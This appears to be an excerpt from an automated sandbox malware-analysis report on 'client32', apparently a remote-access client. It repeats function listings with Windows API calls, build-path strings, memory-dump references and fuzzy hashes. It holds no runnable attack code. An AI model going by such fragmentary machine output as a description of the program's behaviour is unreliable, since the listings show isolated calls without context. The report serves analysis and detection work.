                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                  • API String ID: 819365019-3966830984
                                                                                  • Opcode ID: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                                  • Instruction ID: 66f1678c741d69056f24fb38e5f1926d93c7d4e0e7c38f0779b183b432510f86
                                                                                  • Opcode Fuzzy Hash: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                                  • Instruction Fuzzy Hash: 26E08675A403197BD310DA81DC46ED6F39CDB45714F008025F9595A240D6B1B94087A0
                                                                                  Function 110171F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,0000101C,?,00000000), ref: 11017222
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11017201
                                                                                  • m_hWnd, xrefs: 11017206
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                  • API String ID: 819365019-3966830984
                                                                                  • Opcode ID: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                                  • Instruction ID: ca461658ff4ad9fd457e958dedcd80386c4d58b841a73ce1d2056031be29817f
                                                                                  • Opcode Fuzzy Hash: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                                  • Instruction Fuzzy Hash: 54E0C275A80329BBE2209681DC42FD6F38C9B05714F004435F6196A182D5B0F4408694
                                                                                  Function 11001120 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ShowWindow.USER32(?,?), ref: 1100114B
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001131
                                                                                  • m_hWnd, xrefs: 11001136
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 1604732272-2830328467
                                                                                  • Opcode ID: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                                  • Instruction ID: 819250d5e51c5ae6cd1eebd62df6884d4c995cad7bb4673794d6e20848bff6e8
                                                                                  • Opcode Fuzzy Hash: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                                  • Instruction Fuzzy Hash: A0D02BB191032D7BC3048A81DC42ED6F3CCEB04365F004036F62656100D670E440C3D4
                                                                                  Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • KillTimer.USER32(?,?), ref: 1100102B
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                  • m_hWnd, xrefs: 11001016
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 2229609774-2830328467
                                                                                  • Opcode ID: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                                  • Instruction ID: 3936fa5a6487bcfb2675ba24450813cfe8c9b001fa673c8171921283ac7246b0
                                                                                  • Opcode Fuzzy Hash: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                                  • Instruction Fuzzy Hash: C8D02BB66003287BD320D681DC41ED6F3CCD708354F004036F51956100D5B0E840C390
                                                                                  Function 1100D5E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetVersion.KERNEL32(1100D85E,?,00000000,?,1100CB7A,?), ref: 1100D5E9
                                                                                  • LoadLibraryA.KERNEL32(AudioCapture.dll,?,1100CB7A,?), ref: 1100D5F8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoadVersion
                                                                                  • String ID: AudioCapture.dll
                                                                                  • API String ID: 3209957514-2642820777
                                                                                  • Opcode ID: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
                                                                                  • Instruction ID: 371e9eeab2a9ec736c68531bc0ba6d51211132de28c640fd63a90ee5c1cea0f0
                                                                                  • Opcode Fuzzy Hash: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
                                                                                  • Instruction Fuzzy Hash: BEE0173CA411678BFB028BF98C4839D7AE0A70468DFC400B0E83AC2948FB698440CF20
                                                                                  Function 11113160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1111316A
                                                                                  • SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 11113180
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FindMessageSendWindow
                                                                                  • String ID: MSOfficeWClass
                                                                                  • API String ID: 1741975844-970895155
                                                                                  • Opcode ID: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                                  • Instruction ID: 2732a125022ff7c0da3ed2a920369edb2684b905192db69b753ec1fccd0d92f1
                                                                                  • Opcode Fuzzy Hash: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                                  • Instruction Fuzzy Hash: FAD0127078430C77E6141AE1DE4EF96FB6C9744B65F004028F7159E4C5EAB4B44087BC
                                                                                  Function 1115F310 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(?,000000A8,110AC717), ref: 1115F338
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DestroyErrorExitLastMessageProcessWindowwsprintf
                                                                                  • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                  • API String ID: 1417657345-2201682149
                                                                                  • Opcode ID: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                                  • Instruction ID: 7db3f745f54082ef040700b2ebbb9d394f22af4f20fbf84319d784bae123f924
                                                                                  • Opcode Fuzzy Hash: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                                  • Instruction Fuzzy Hash: 9CD0A770A503359BD7608A56EC86BC6F2D4AB1221CF044479E0A362551E270F584C681
                                                                                  Function 1101D390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetMenu.USER32(00000000), ref: 1101D3B4
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D39E
                                                                                  • m_hWnd, xrefs: 1101D3A3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMenuMessageProcesswsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 1590435379-2830328467
                                                                                  • Opcode ID: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                                  • Instruction ID: 75955eb5d3bdaa86fb34179760e08c08bc775c18ff6c0b8e66661a9f5e9df206
                                                                                  • Opcode Fuzzy Hash: 1024b712624d312cdb50eec61baa504417252f83fa22596b784198089b8c0041
                                                                                  • Instruction Fuzzy Hash: 18D022B1D00235ABC700D662EC4ABC9F2C49B09318F004076F03666004E2B4E4808384
                                                                                  Function 1115B910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MenuProp
                                                                                  • String ID: OldMenu
                                                                                  • API String ID: 601939786-3235417843
                                                                                  • Opcode ID: b2ae159b91161bc5121d418d4eba0eb432953fd9fc1df4eba921856773b07696
                                                                                  • Instruction ID: 00d1d82ffe912eb1f0033c226aa13db8fbf5a9b0d38ca05e3ef3a03686f26a50
                                                                                  • Opcode Fuzzy Hash: b2ae159b91161bc5121d418d4eba0eb432953fd9fc1df4eba921856773b07696
                                                                                  • Instruction Fuzzy Hash: CBC0123214257DA782016A95DD44DCBFB6DEE0A1557044022F520D2401E721551047E9